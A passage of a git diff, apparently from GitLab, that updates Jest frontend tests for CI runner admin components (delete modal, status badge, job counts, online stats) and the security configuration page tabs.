projectMock = { id: '1234', userPermissions: userPermissionsMock, pathLocks: 
{ - nodes: [], + nodes: [ + { + id: 'test', + path: simpleViewerMock.path, + user: { id: '123', username: 'root' }, + }, + ], }, repository: { empty: false, diff --git a/spec/frontend/runner/admin_runners/admin_runners_app_spec.js b/spec/frontend/runner/admin_runners/admin_runners_app_spec.js index 7eda9aa2850..7015fe809b0 100644 --- a/spec/frontend/runner/admin_runners/admin_runners_app_spec.js +++ b/spec/frontend/runner/admin_runners/admin_runners_app_spec.js @@ -147,7 +147,7 @@ describe('AdminRunnersApp', () => { }), expect.objectContaining({ type: PARAM_KEY_TAG, - recentTokenValuesStorageKey: `${ADMIN_FILTERED_SEARCH_NAMESPACE}-recent-tags`, + recentSuggestionsStorageKey: `${ADMIN_FILTERED_SEARCH_NAMESPACE}-recent-tags`, }), ]); }); @@ -155,9 +155,7 @@ describe('AdminRunnersApp', () => { it('shows the active runner count', () => { createComponent({ mountFn: mount }); - expect(findRunnerFilteredSearchBar().text()).toMatch( - `Runners currently online: ${mockActiveRunnersCount}`, - ); + expect(wrapper.text()).toMatch(new RegExp(`Online Runners ${mockActiveRunnersCount}`)); }); describe('when a filter is preselected', () => { diff --git a/spec/frontend/runner/components/cells/runner_actions_cell_spec.js b/spec/frontend/runner/components/cells/runner_actions_cell_spec.js index 2874bdbe280..95c212cb0a9 100644 --- a/spec/frontend/runner/components/cells/runner_actions_cell_spec.js +++ b/spec/frontend/runner/components/cells/runner_actions_cell_spec.js @@ -3,13 +3,17 @@ import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import waitForPromises from 'helpers/wait_for_promises'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import createFlash from '~/flash'; +import { getIdFromGraphQLId } from '~/graphql_shared/utils'; + +import { captureException } from '~/runner/sentry_utils'; import RunnerActionCell from 
'~/runner/components/cells/runner_actions_cell.vue'; +import RunnerDeleteModal from '~/runner/components/runner_delete_modal.vue'; import getGroupRunnersQuery from '~/runner/graphql/get_group_runners.query.graphql'; import getRunnersQuery from '~/runner/graphql/get_runners.query.graphql'; import runnerDeleteMutation from '~/runner/graphql/runner_delete.mutation.graphql'; import runnerActionsUpdateMutation from '~/runner/graphql/runner_actions_update.mutation.graphql'; -import { captureException } from '~/runner/sentry_utils'; import { runnersData } from '../../mock_data'; const mockRunner = runnersData.data.runners.nodes[0]; @@ -25,12 +29,16 @@ jest.mock('~/runner/sentry_utils'); describe('RunnerTypeCell', () => { let wrapper; + + const mockToastShow = jest.fn(); const runnerDeleteMutationHandler = jest.fn(); const runnerActionsUpdateMutationHandler = jest.fn(); const findEditBtn = () => wrapper.findByTestId('edit-runner'); const findToggleActiveBtn = () => wrapper.findByTestId('toggle-active-runner'); + const findRunnerDeleteModal = () => wrapper.findComponent(RunnerDeleteModal); const findDeleteBtn = () => wrapper.findByTestId('delete-runner'); + const getTooltip = (w) => getBinding(w.element, 'gl-tooltip')?.value; const createComponent = ({ active = true } = {}, options) => { wrapper = extendedWrapper( @@ -38,6 +46,7 @@ describe('RunnerTypeCell', () => { propsData: { runner: { id: mockRunner.id, + shortSha: mockRunner.shortSha, adminUrl: mockRunner.adminUrl, active, }, @@ -47,6 +56,15 @@ describe('RunnerTypeCell', () => { [runnerDeleteMutation, runnerDeleteMutationHandler], [runnerActionsUpdateMutation, runnerActionsUpdateMutationHandler], ]), + directives: { + GlTooltip: createMockDirective(), + GlModal: createMockDirective(), + }, + mocks: { + $toast: { + show: mockToastShow, + }, + }, ...options, }), ); @@ -72,197 +90,85 @@ describe('RunnerTypeCell', () => { }); afterEach(() => { + mockToastShow.mockReset(); runnerDeleteMutationHandler.mockReset(); 
runnerActionsUpdateMutationHandler.mockReset(); wrapper.destroy(); }); - it('Displays the runner edit link with the correct href', () => { - createComponent(); - - expect(findEditBtn().attributes('href')).toBe(mockRunner.adminUrl); - }); - - describe.each` - state | label | icon | isActive | newActiveValue - ${'active'} | ${'Pause'} | ${'pause'} | ${true} | ${false} - ${'paused'} | ${'Resume'} | ${'play'} | ${false} | ${true} - `('When the runner is $state', ({ label, icon, isActive, newActiveValue }) => { - beforeEach(() => { - createComponent({ active: isActive }); - }); - - it(`Displays a ${icon} button`, () => { - expect(findToggleActiveBtn().props('loading')).toBe(false); - expect(findToggleActiveBtn().props('icon')).toBe(icon); - expect(findToggleActiveBtn().attributes('title')).toBe(label); - expect(findToggleActiveBtn().attributes('aria-label')).toBe(label); - }); - - it(`After clicking the ${icon} button, the button has a loading state`, async () => { - await findToggleActiveBtn().vm.$emit('click'); - - expect(findToggleActiveBtn().props('loading')).toBe(true); - }); - - it(`After the ${icon} button is clicked, stale tooltip is removed`, async () => { - await findToggleActiveBtn().vm.$emit('click'); + describe('Edit Action', () => { + it('Displays the runner edit link with the correct href', () => { + createComponent(); - expect(findToggleActiveBtn().attributes('title')).toBe(''); - expect(findToggleActiveBtn().attributes('aria-label')).toBe(''); + expect(findEditBtn().attributes('href')).toBe(mockRunner.adminUrl); }); + }); - describe(`When clicking on the ${icon} button`, () => { - it(`The apollo mutation to set active to ${newActiveValue} is called`, async () => { - expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledTimes(0); - - await findToggleActiveBtn().vm.$emit('click'); + describe('Toggle active action', () => { + describe.each` + state | label | icon | isActive | newActiveValue + ${'active'} | ${'Pause'} | ${'pause'} | ${true} | ${false} 
+ ${'paused'} | ${'Resume'} | ${'play'} | ${false} | ${true} + `('When the runner is $state', ({ label, icon, isActive, newActiveValue }) => { + beforeEach(() => { + createComponent({ active: isActive }); + }); - expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledTimes(1); - expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledWith({ - input: { - id: mockRunner.id, - active: newActiveValue, - }, - }); + it(`Displays a ${icon} button`, () => { + expect(findToggleActiveBtn().props('loading')).toBe(false); + expect(findToggleActiveBtn().props('icon')).toBe(icon); + expect(getTooltip(findToggleActiveBtn())).toBe(label); + expect(findToggleActiveBtn().attributes('aria-label')).toBe(label); }); - it('The button does not have a loading state after the mutation occurs', async () => { + it(`After clicking the ${icon} button, the button has a loading state`, async () => { await findToggleActiveBtn().vm.$emit('click'); expect(findToggleActiveBtn().props('loading')).toBe(true); - - await waitForPromises(); - - expect(findToggleActiveBtn().props('loading')).toBe(false); }); - }); - describe('When update fails', () => { - describe('On a network error', () => { - const mockErrorMsg = 'Update error!'; - - beforeEach(async () => { - runnerActionsUpdateMutationHandler.mockRejectedValueOnce(new Error(mockErrorMsg)); - - await findToggleActiveBtn().vm.$emit('click'); - }); - - it('error is reported to sentry', () => { - expect(captureException).toHaveBeenCalledWith({ - error: new Error(`Network error: ${mockErrorMsg}`), - component: 'RunnerActionsCell', - }); - }); + it(`After the ${icon} button is clicked, stale tooltip is removed`, async () => { + await findToggleActiveBtn().vm.$emit('click'); - it('error is shown to the user', () => { - expect(createFlash).toHaveBeenCalledTimes(1); - }); + expect(getTooltip(findToggleActiveBtn())).toBe(''); + expect(findToggleActiveBtn().attributes('aria-label')).toBe(''); }); - describe('On a validation error', () => { - const 
mockErrorMsg = 'Runner not found!'; - const mockErrorMsg2 = 'User not allowed!'; - - beforeEach(async () => { - runnerActionsUpdateMutationHandler.mockResolvedValue({ - data: { - runnerUpdate: { - runner: mockRunner, - errors: [mockErrorMsg, mockErrorMsg2], - }, - }, - }); + describe(`When clicking on the ${icon} button`, () => { + it(`The apollo mutation to set active to ${newActiveValue} is called`, async () => { + expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledTimes(0); await findToggleActiveBtn().vm.$emit('click'); - }); - - it('error is reported to sentry', () => { - expect(captureException).toHaveBeenCalledWith({ - error: new Error(`${mockErrorMsg} ${mockErrorMsg2}`), - component: 'RunnerActionsCell', - }); - }); - it('error is shown to the user', () => { - expect(createFlash).toHaveBeenCalledTimes(1); - }); - }); - }); - }); - - describe('When the user clicks a runner', () => { - beforeEach(() => { - jest.spyOn(window, 'confirm'); - - createComponent(); - }); - - afterEach(() => { - window.confirm.mockRestore(); - }); - - describe('When the user confirms deletion', () => { - beforeEach(async () => { - window.confirm.mockReturnValue(true); - await findDeleteBtn().vm.$emit('click'); - }); - - it('The user sees a confirmation alert', () => { - expect(window.confirm).toHaveBeenCalledTimes(1); - expect(window.confirm).toHaveBeenCalledWith(expect.any(String)); - }); - - it('The delete mutation is called correctly', () => { - expect(runnerDeleteMutationHandler).toHaveBeenCalledTimes(1); - expect(runnerDeleteMutationHandler).toHaveBeenCalledWith({ - input: { id: mockRunner.id }, - }); - }); - - it('When delete mutation is called, current runners are refetched', async () => { - jest.spyOn(wrapper.vm.$apollo, 'mutate'); - - await findDeleteBtn().vm.$emit('click'); - - expect(wrapper.vm.$apollo.mutate).toHaveBeenCalledWith({ - mutation: runnerDeleteMutation, - variables: { + expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledTimes(1); + 
expect(runnerActionsUpdateMutationHandler).toHaveBeenCalledWith({ input: { id: mockRunner.id, + active: newActiveValue, }, - }, - awaitRefetchQueries: true, - refetchQueries: [getRunnersQueryName, getGroupRunnersQueryName], + }); }); - }); - - it('The delete button does not have a loading state', () => { - expect(findDeleteBtn().props('loading')).toBe(false); - expect(findDeleteBtn().attributes('title')).toBe('Remove'); - }); - it('After the delete button is clicked, loading state is shown', async () => { - await findDeleteBtn().vm.$emit('click'); + it('The button does not have a loading state after the mutation occurs', async () => { + await findToggleActiveBtn().vm.$emit('click'); - expect(findDeleteBtn().props('loading')).toBe(true); - }); + expect(findToggleActiveBtn().props('loading')).toBe(true); - it('After the delete button is clicked, stale tooltip is removed', async () => { - await findDeleteBtn().vm.$emit('click'); + await waitForPromises(); - expect(findDeleteBtn().attributes('title')).toBe(''); + expect(findToggleActiveBtn().props('loading')).toBe(false); + }); }); - describe('When delete fails', () => { + describe('When update fails', () => { describe('On a network error', () => { - const mockErrorMsg = 'Delete error!'; + const mockErrorMsg = 'Update error!'; beforeEach(async () => { - runnerDeleteMutationHandler.mockRejectedValueOnce(new Error(mockErrorMsg)); + runnerActionsUpdateMutationHandler.mockRejectedValueOnce(new Error(mockErrorMsg)); - await findDeleteBtn().vm.$emit('click'); + await findToggleActiveBtn().vm.$emit('click'); }); it('error is reported to sentry', () => { @@ -282,15 +188,16 @@ describe('RunnerTypeCell', () => { const mockErrorMsg2 = 'User not allowed!'; beforeEach(async () => { - runnerDeleteMutationHandler.mockResolvedValue({ + runnerActionsUpdateMutationHandler.mockResolvedValue({ data: { - runnerDelete: { + runnerUpdate: { + runner: mockRunner, errors: [mockErrorMsg, mockErrorMsg2], }, }, }); - await 
findDeleteBtn().vm.$emit('click'); + await findToggleActiveBtn().vm.$emit('click'); }); it('error is reported to sentry', () => { @@ -306,24 +213,129 @@ describe('RunnerTypeCell', () => { }); }); }); + }); - describe('When the user does not confirm deletion', () => { - beforeEach(async () => { - window.confirm.mockReturnValue(false); - await findDeleteBtn().vm.$emit('click'); + describe('Delete action', () => { + beforeEach(() => { + createComponent( + {}, + { + stubs: { RunnerDeleteModal }, + }, + ); + }); + + it('Delete button opens delete modal', () => { + const modalId = getBinding(findDeleteBtn().element, 'gl-modal').value; + + expect(findRunnerDeleteModal().attributes('modal-id')).toBeDefined(); + expect(findRunnerDeleteModal().attributes('modal-id')).toBe(modalId); + }); + + it('Delete modal shows the runner name', () => { + expect(findRunnerDeleteModal().props('runnerName')).toBe( + `#${getIdFromGraphQLId(mockRunner.id)} (${mockRunner.shortSha})`, + ); + }); + it('The delete button does not have a loading icon', () => { + expect(findDeleteBtn().props('loading')).toBe(false); + expect(getTooltip(findDeleteBtn())).toBe('Delete runner'); + }); + + it('When delete mutation is called, current runners are refetched', () => { + jest.spyOn(wrapper.vm.$apollo, 'mutate'); + + findRunnerDeleteModal().vm.$emit('primary'); + + expect(wrapper.vm.$apollo.mutate).toHaveBeenCalledWith({ + mutation: runnerDeleteMutation, + variables: { + input: { + id: mockRunner.id, + }, + }, + awaitRefetchQueries: true, + refetchQueries: [getRunnersQueryName, getGroupRunnersQueryName], }); + }); - it('The user sees a confirmation alert', () => { - expect(window.confirm).toHaveBeenCalledTimes(1); + describe('When delete is clicked', () => { + beforeEach(() => { + findRunnerDeleteModal().vm.$emit('primary'); }); - it('The delete mutation is not called', () => { - expect(runnerDeleteMutationHandler).toHaveBeenCalledTimes(0); + it('The delete mutation is called correctly', () => { + 
expect(runnerDeleteMutationHandler).toHaveBeenCalledTimes(1); + expect(runnerDeleteMutationHandler).toHaveBeenCalledWith({ + input: { id: mockRunner.id }, + }); }); - it('The delete button does not have a loading state', () => { - expect(findDeleteBtn().props('loading')).toBe(false); - expect(findDeleteBtn().attributes('title')).toBe('Remove'); + it('The delete button has a loading icon', () => { + expect(findDeleteBtn().props('loading')).toBe(true); + expect(getTooltip(findDeleteBtn())).toBe(''); + }); + + it('The toast notification is shown', () => { + expect(mockToastShow).toHaveBeenCalledTimes(1); + expect(mockToastShow).toHaveBeenCalledWith( + expect.stringContaining(`#${getIdFromGraphQLId(mockRunner.id)} (${mockRunner.shortSha})`), + ); + }); + }); + + describe('When delete fails', () => { + describe('On a network error', () => { + const mockErrorMsg = 'Delete error!'; + + beforeEach(() => { + runnerDeleteMutationHandler.mockRejectedValueOnce(new Error(mockErrorMsg)); + + findRunnerDeleteModal().vm.$emit('primary'); + }); + + it('error is reported to sentry', () => { + expect(captureException).toHaveBeenCalledWith({ + error: new Error(`Network error: ${mockErrorMsg}`), + component: 'RunnerActionsCell', + }); + }); + + it('error is shown to the user', () => { + expect(createFlash).toHaveBeenCalledTimes(1); + }); + + it('toast notification is not shown', () => { + expect(mockToastShow).not.toHaveBeenCalled(); + }); + }); + + describe('On a validation error', () => { + const mockErrorMsg = 'Runner not found!'; + const mockErrorMsg2 = 'User not allowed!'; + + beforeEach(() => { + runnerDeleteMutationHandler.mockResolvedValue({ + data: { + runnerDelete: { + errors: [mockErrorMsg, mockErrorMsg2], + }, + }, + }); + + findRunnerDeleteModal().vm.$emit('primary'); + }); + + it('error is reported to sentry', () => { + expect(captureException).toHaveBeenCalledWith({ + error: new Error(`${mockErrorMsg} ${mockErrorMsg2}`), + component: 'RunnerActionsCell', + }); + }); + + 
it('error is shown to the user', () => { + expect(createFlash).toHaveBeenCalledTimes(1); + }); }); }); }); diff --git a/spec/frontend/runner/components/runner_contacted_state_badge_spec.js b/spec/frontend/runner/components/runner_contacted_state_badge_spec.js deleted file mode 100644 index 57a27f39826..00000000000 --- a/spec/frontend/runner/components/runner_contacted_state_badge_spec.js +++ /dev/null @@ -1,86 +0,0 @@ -import { GlBadge } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; -import RunnerContactedStateBadge from '~/runner/components/runner_contacted_state_badge.vue'; -import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -import { STATUS_ONLINE, STATUS_OFFLINE, STATUS_NOT_CONNECTED } from '~/runner/constants'; - -describe('RunnerTypeBadge', () => { - let wrapper; - - const findBadge = () => wrapper.findComponent(GlBadge); - const getTooltip = () => getBinding(findBadge().element, 'gl-tooltip'); - - const createComponent = ({ runner = {} } = {}) => { - wrapper = shallowMount(RunnerContactedStateBadge, { - propsData: { - runner: { - contactedAt: '2021-01-01T00:00:00Z', - status: STATUS_ONLINE, - ...runner, - }, - }, - directives: { - GlTooltip: createMockDirective(), - }, - }); - }; - - beforeEach(() => { - jest.useFakeTimers('modern'); - }); - - afterEach(() => { - jest.useFakeTimers('legacy'); - - wrapper.destroy(); - }); - - it('renders online state', () => { - jest.setSystemTime(new Date('2021-01-01T00:01:00Z')); - - createComponent(); - - expect(wrapper.text()).toBe('online'); - expect(findBadge().props('variant')).toBe('success'); - expect(getTooltip().value).toBe('Runner is online; last contact was 1 minute ago'); - }); - - it('renders offline state', () => { - jest.setSystemTime(new Date('2021-01-02T00:00:00Z')); - - createComponent({ - runner: { - status: STATUS_OFFLINE, - }, - }); - - expect(wrapper.text()).toBe('offline'); - expect(findBadge().props('variant')).toBe('muted'); - 
expect(getTooltip().value).toBe( - 'No recent contact from this runner; last contact was 1 day ago', - ); - }); - - it('renders not connected state', () => { - createComponent({ - runner: { - contactedAt: null, - status: STATUS_NOT_CONNECTED, - }, - }); - - expect(wrapper.text()).toBe('not connected'); - expect(findBadge().props('variant')).toBe('muted'); - expect(getTooltip().value).toMatch('This runner has never connected'); - }); - - it('does not fail when data is missing', () => { - createComponent({ - runner: { - status: null, - }, - }); - - expect(wrapper.text()).toBe(''); - }); -}); diff --git a/spec/frontend/runner/components/runner_delete_modal_spec.js b/spec/frontend/runner/components/runner_delete_modal_spec.js new file mode 100644 index 00000000000..3e5b634d815 --- /dev/null +++ b/spec/frontend/runner/components/runner_delete_modal_spec.js @@ -0,0 +1,60 @@ +import { GlModal } from '@gitlab/ui'; +import { mount, shallowMount } from '@vue/test-utils'; +import RunnerDeleteModal from '~/runner/components/runner_delete_modal.vue'; + +describe('RunnerDeleteModal', () => { + let wrapper; + + const findGlModal = () => wrapper.findComponent(GlModal); + + const createComponent = ({ props = {} } = {}, mountFn = shallowMount) => { + wrapper = mountFn(RunnerDeleteModal, { + attachTo: document.body, + propsData: { + runnerName: '#99 (AABBCCDD)', + ...props, + }, + attrs: { + modalId: 'delete-runner-modal-99', + }, + }); + }; + + it('Displays title', () => { + createComponent(); + + expect(findGlModal().props('title')).toBe('Delete runner #99 (AABBCCDD)?'); + }); + + it('Displays buttons', () => { + createComponent(); + + expect(findGlModal().props('actionPrimary')).toMatchObject({ text: 'Delete runner' }); + expect(findGlModal().props('actionCancel')).toMatchObject({ text: 'Cancel' }); + }); + + it('Displays contents', () => { + createComponent(); + + expect(findGlModal().html()).toContain( + 'The runner will be permanently deleted and no longer available for 
projects or groups in the instance. Are you sure you want to continue?', + ); + }); + + describe('When modal is confirmed by the user', () => { + let hideModalSpy; + + beforeEach(() => { + createComponent({}, mount); + hideModalSpy = jest.spyOn(wrapper.vm.$refs.modal, 'hide').mockImplementation(() => {}); + }); + + it('Modal gets hidden', () => { + expect(hideModalSpy).toHaveBeenCalledTimes(0); + + findGlModal().vm.$emit('primary'); + + expect(hideModalSpy).toHaveBeenCalledTimes(1); + }); + }); +}); diff --git a/spec/frontend/runner/components/runner_filtered_search_bar_spec.js b/spec/frontend/runner/components/runner_filtered_search_bar_spec.js index 9ea0955f2a1..5ab0db019a3 100644 --- a/spec/frontend/runner/components/runner_filtered_search_bar_spec.js +++ b/spec/frontend/runner/components/runner_filtered_search_bar_spec.js @@ -15,7 +15,6 @@ describe('RunnerList', () => { const findFilteredSearch = () => wrapper.findComponent(FilteredSearch); const findGlFilteredSearch = () => wrapper.findComponent(GlFilteredSearch); const findSortOptions = () => wrapper.findAllComponents(GlDropdownItem); - const findActiveRunnersMessage = () => wrapper.findByTestId('runner-count'); const mockDefaultSort = 'CREATED_DESC'; const mockOtherSort = 'CONTACTED_DESC'; @@ -23,7 +22,6 @@ describe('RunnerList', () => { { type: PARAM_KEY_STATUS, value: { data: STATUS_ACTIVE, operator: '=' } }, { type: 'filtered-search-term', value: { data: '' } }, ]; - const mockActiveRunnersCount = 2; const expectToHaveLastEmittedInput = (value) => { const inputs = wrapper.emitted('input'); @@ -43,9 +41,6 @@ describe('RunnerList', () => { }, ...props, }, - slots: { - 'runner-count': `Runners currently online: ${mockActiveRunnersCount}`, - }, stubs: { FilteredSearch, GlFilteredSearch, @@ -69,12 +64,6 @@ describe('RunnerList', () => { expect(findFilteredSearch().props('namespace')).toBe('runners'); }); - it('Displays an active runner count', () => { - expect(findActiveRunnersMessage().text()).toBe( - 
`Runners currently online: ${mockActiveRunnersCount}`, - ); - }); - it('sets sorting options', () => { const SORT_OPTIONS_COUNT = 2; diff --git a/spec/frontend/runner/components/runner_list_spec.js b/spec/frontend/runner/components/runner_list_spec.js index 986e55a2132..5a14fa5a2d5 100644 --- a/spec/frontend/runner/components/runner_list_spec.js +++ b/spec/frontend/runner/components/runner_list_spec.js @@ -46,12 +46,19 @@ describe('RunnerList', () => { 'Runner ID', 'Version', 'IP Address', + 'Jobs', 'Tags', 'Last contact', '', // actions has no label ]); }); + it('Sets runner id as a row key', () => { + createComponent({}, shallowMount); + + expect(findTable().attributes('primary-key')).toBe('id'); + }); + it('Displays a list of runners', () => { expect(findRows()).toHaveLength(4); @@ -73,6 +80,7 @@ describe('RunnerList', () => { // Other fields expect(findCell({ fieldKey: 'version' }).text()).toBe(version); expect(findCell({ fieldKey: 'ipAddress' }).text()).toBe(ipAddress); + expect(findCell({ fieldKey: 'jobCount' }).text()).toBe('0'); expect(findCell({ fieldKey: 'tagList' }).text()).toBe(''); expect(findCell({ fieldKey: 'contactedAt' }).text()).toEqual(expect.any(String)); @@ -83,6 +91,42 @@ describe('RunnerList', () => { expect(actions.findByTestId('toggle-active-runner').exists()).toBe(true); }); + describe('Table data formatting', () => { + let mockRunnersCopy; + + beforeEach(() => { + mockRunnersCopy = [ + { + ...mockRunners[0], + }, + ]; + }); + + it('Formats job counts', () => { + mockRunnersCopy[0].jobCount = 1; + + createComponent({ props: { runners: mockRunnersCopy } }, mount); + + expect(findCell({ fieldKey: 'jobCount' }).text()).toBe('1'); + }); + + it('Formats large job counts', () => { + mockRunnersCopy[0].jobCount = 1000; + + createComponent({ props: { runners: mockRunnersCopy } }, mount); + + expect(findCell({ fieldKey: 'jobCount' }).text()).toBe('1,000'); + }); + + it('Formats large job counts with a plus symbol', () => { + 
mockRunnersCopy[0].jobCount = 1001; + + createComponent({ props: { runners: mockRunnersCopy } }, mount); + + expect(findCell({ fieldKey: 'jobCount' }).text()).toBe('1,000+'); + }); + }); + it('Shows runner identifier', () => { const { id, shortSha } = mockRunners[0]; const numericId = getIdFromGraphQLId(id); diff --git a/spec/frontend/runner/components/runner_status_badge_spec.js b/spec/frontend/runner/components/runner_status_badge_spec.js new file mode 100644 index 00000000000..a19515d6ed2 --- /dev/null +++ b/spec/frontend/runner/components/runner_status_badge_spec.js @@ -0,0 +1,130 @@ +import { GlBadge } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import RunnerStatusBadge from '~/runner/components/runner_status_badge.vue'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; +import { + STATUS_ONLINE, + STATUS_OFFLINE, + STATUS_STALE, + STATUS_NOT_CONNECTED, + STATUS_NEVER_CONTACTED, +} from '~/runner/constants'; + +describe('RunnerTypeBadge', () => { + let wrapper; + + const findBadge = () => wrapper.findComponent(GlBadge); + const getTooltip = () => getBinding(findBadge().element, 'gl-tooltip'); + + const createComponent = (props = {}) => { + wrapper = shallowMount(RunnerStatusBadge, { + propsData: { + runner: { + contactedAt: '2020-12-31T23:59:00Z', + status: STATUS_ONLINE, + }, + ...props, + }, + directives: { + GlTooltip: createMockDirective(), + }, + }); + }; + + beforeEach(() => { + jest.useFakeTimers('modern'); + jest.setSystemTime(new Date('2021-01-01T00:00:00Z')); + }); + + afterEach(() => { + jest.useFakeTimers('legacy'); + + wrapper.destroy(); + }); + + it('renders online state', () => { + createComponent(); + + expect(wrapper.text()).toBe('online'); + expect(findBadge().props('variant')).toBe('success'); + expect(getTooltip().value).toBe('Runner is online; last contact was 1 minute ago'); + }); + + it('renders not connected state', () => { + createComponent({ + runner: { + contactedAt: null, + 
status: STATUS_NOT_CONNECTED, + }, + }); + + expect(wrapper.text()).toBe('not connected'); + expect(findBadge().props('variant')).toBe('muted'); + expect(getTooltip().value).toMatch('This runner has never connected'); + }); + + it('renders never contacted state as not connected, for backwards compatibility', () => { + createComponent({ + runner: { + contactedAt: null, + status: STATUS_NEVER_CONTACTED, + }, + }); + + expect(wrapper.text()).toBe('not connected'); + expect(findBadge().props('variant')).toBe('muted'); + expect(getTooltip().value).toMatch('This runner has never connected'); + }); + + it('renders offline state', () => { + createComponent({ + runner: { + contactedAt: '2020-12-31T00:00:00Z', + status: STATUS_OFFLINE, + }, + }); + + expect(wrapper.text()).toBe('offline'); + expect(findBadge().props('variant')).toBe('muted'); + expect(getTooltip().value).toBe( + 'No recent contact from this runner; last contact was 1 day ago', + ); + }); + + it('renders stale state', () => { + createComponent({ + runner: { + contactedAt: '2020-01-01T00:00:00Z', + status: STATUS_STALE, + }, + }); + + expect(wrapper.text()).toBe('stale'); + expect(findBadge().props('variant')).toBe('warning'); + expect(getTooltip().value).toBe('No contact from this runner in over 3 months'); + }); + + describe('does not fail when data is missing', () => { + it('contacted_at is missing', () => { + createComponent({ + runner: { + contactedAt: null, + status: STATUS_ONLINE, + }, + }); + + expect(wrapper.text()).toBe('online'); + expect(getTooltip().value).toBe('Runner is online; last contact was n/a'); + }); + + it('status is missing', () => { + createComponent({ + runner: { + status: null, + }, + }); + + expect(wrapper.text()).toBe(''); + }); + }); +}); diff --git a/spec/frontend/runner/components/search_tokens/tag_token_spec.js b/spec/frontend/runner/components/search_tokens/tag_token_spec.js index 52b87542243..89c06ba2df4 100644 --- 
a/spec/frontend/runner/components/search_tokens/tag_token_spec.js +++ b/spec/frontend/runner/components/search_tokens/tag_token_spec.js @@ -41,7 +41,7 @@ const mockTagTokenConfig = { title: 'Tags', type: 'tag', token: TagToken, - recentTokenValuesStorageKey: mockStorageKey, + recentSuggestionsStorageKey: mockStorageKey, operators: OPERATOR_IS_ONLY, }; diff --git a/spec/frontend/runner/components/stat/runner_online_stat_spec.js b/spec/frontend/runner/components/stat/runner_online_stat_spec.js new file mode 100644 index 00000000000..18f865aa22c --- /dev/null +++ b/spec/frontend/runner/components/stat/runner_online_stat_spec.js @@ -0,0 +1,34 @@ +import { GlSingleStat } from '@gitlab/ui/dist/charts'; +import { shallowMount, mount } from '@vue/test-utils'; +import RunnerOnlineBadge from '~/runner/components/stat/runner_online_stat.vue'; + +describe('RunnerOnlineBadge', () => { + let wrapper; + + const findSingleStat = () => wrapper.findComponent(GlSingleStat); + + const createComponent = ({ props = {} } = {}, mountFn = shallowMount) => { + wrapper = mountFn(RunnerOnlineBadge, { + propsData: { + value: '99', + ...props, + }, + }); + }; + + afterEach(() => { + wrapper.destroy(); + }); + + it('Uses a success appearance', () => { + createComponent({}, shallowMount); + + expect(findSingleStat().props('variant')).toBe('success'); + }); + + it('Renders a value', () => { + createComponent({}, mount); + + expect(wrapper.text()).toMatch(new RegExp(`Online Runners 99\\s+online`)); + }); +}); diff --git a/spec/frontend/runner/group_runners/group_runners_app_spec.js b/spec/frontend/runner/group_runners/group_runners_app_spec.js index 39bca743c80..4451100de19 100644 --- a/spec/frontend/runner/group_runners/group_runners_app_spec.js +++ b/spec/frontend/runner/group_runners/group_runners_app_spec.js @@ -130,24 +130,24 @@ describe('GroupRunnersApp', () => { }); describe('shows the active runner count', () => { + const expectedOnlineCount = (count) => new RegExp(`Online Runners 
${count}`); + it('with a regular value', () => { createComponent({ mountFn: mount }); - expect(findRunnerFilteredSearchBar().text()).toMatch( - `Runners in this group: ${mockGroupRunnersLimitedCount}`, - ); + expect(wrapper.text()).toMatch(expectedOnlineCount(mockGroupRunnersLimitedCount)); }); it('at the limit', () => { createComponent({ props: { groupRunnersLimitedCount: 1000 }, mountFn: mount }); - expect(findRunnerFilteredSearchBar().text()).toMatch(`Runners in this group: 1,000`); + expect(wrapper.text()).toMatch(expectedOnlineCount('1,000')); }); it('over the limit', () => { createComponent({ props: { groupRunnersLimitedCount: 1001 }, mountFn: mount }); - expect(findRunnerFilteredSearchBar().text()).toMatch(`Runners in this group: 1,000+`); + expect(wrapper.text()).toMatch(expectedOnlineCount('1,000\\+')); }); }); diff --git a/spec/frontend/security_configuration/components/app_spec.js b/spec/frontend/security_configuration/components/app_spec.js index d4ee9e6e43d..0a2b18caf25 100644 --- a/spec/frontend/security_configuration/components/app_spec.js +++ b/spec/frontend/security_configuration/components/app_spec.js @@ -20,6 +20,7 @@ import { AUTO_DEVOPS_ENABLED_ALERT_DISMISSED_STORAGE_KEY, } from '~/security_configuration/components/constants'; import FeatureCard from '~/security_configuration/components/feature_card.vue'; +import TrainingProviderList from '~/security_configuration/components/training_provider_list.vue'; import UpgradeBanner from '~/security_configuration/components/upgrade_banner.vue'; import { @@ -39,7 +40,11 @@ describe('App component', () => { let wrapper; let userCalloutDismissSpy; - const createComponent = ({ shouldShowCallout = true, ...propsData }) => { + const createComponent = ({ + shouldShowCallout = true, + secureVulnerabilityTraining = true, + ...propsData + }) => { userCalloutDismissSpy = jest.fn(); wrapper = extendedWrapper( @@ -50,6 +55,9 @@ describe('App component', () => { autoDevopsHelpPagePath, autoDevopsPath, projectPath, + 
glFeatures: { + secureVulnerabilityTraining, + }, }, stubs: { ...stubChildren(SecurityConfigurationApp), @@ -71,6 +79,7 @@ describe('App component', () => { const findTabs = () => wrapper.findAllComponents(GlTab); const findByTestId = (id) => wrapper.findByTestId(id); const findFeatureCards = () => wrapper.findAllComponents(FeatureCard); + const findTrainingProviderList = () => wrapper.findComponent(TrainingProviderList); const findManageViaMRErrorAlert = () => wrapper.findByTestId('manage-via-mr-error-alert'); const findLink = ({ href, text, container = wrapper }) => { const selector = `a[href="${href}"]`; @@ -138,20 +147,20 @@ describe('App component', () => { expect(mainHeading.text()).toContain('Security Configuration'); }); - it('renders GlTab Component ', () => { - expect(findTab().exists()).toBe(true); - }); + describe('tabs', () => { + const expectedTabs = ['security-testing', 'compliance-testing', 'vulnerability-management']; - it('renders right amount of tabs with correct title ', () => { - expect(findTabs()).toHaveLength(2); - }); + it('renders GlTab Component', () => { + expect(findTab().exists()).toBe(true); + }); - it('renders security-testing tab', () => { - expect(findByTestId('security-testing-tab').exists()).toBe(true); - }); + it('renders correct amount of tabs', () => { + expect(findTabs()).toHaveLength(expectedTabs.length); + }); - it('renders 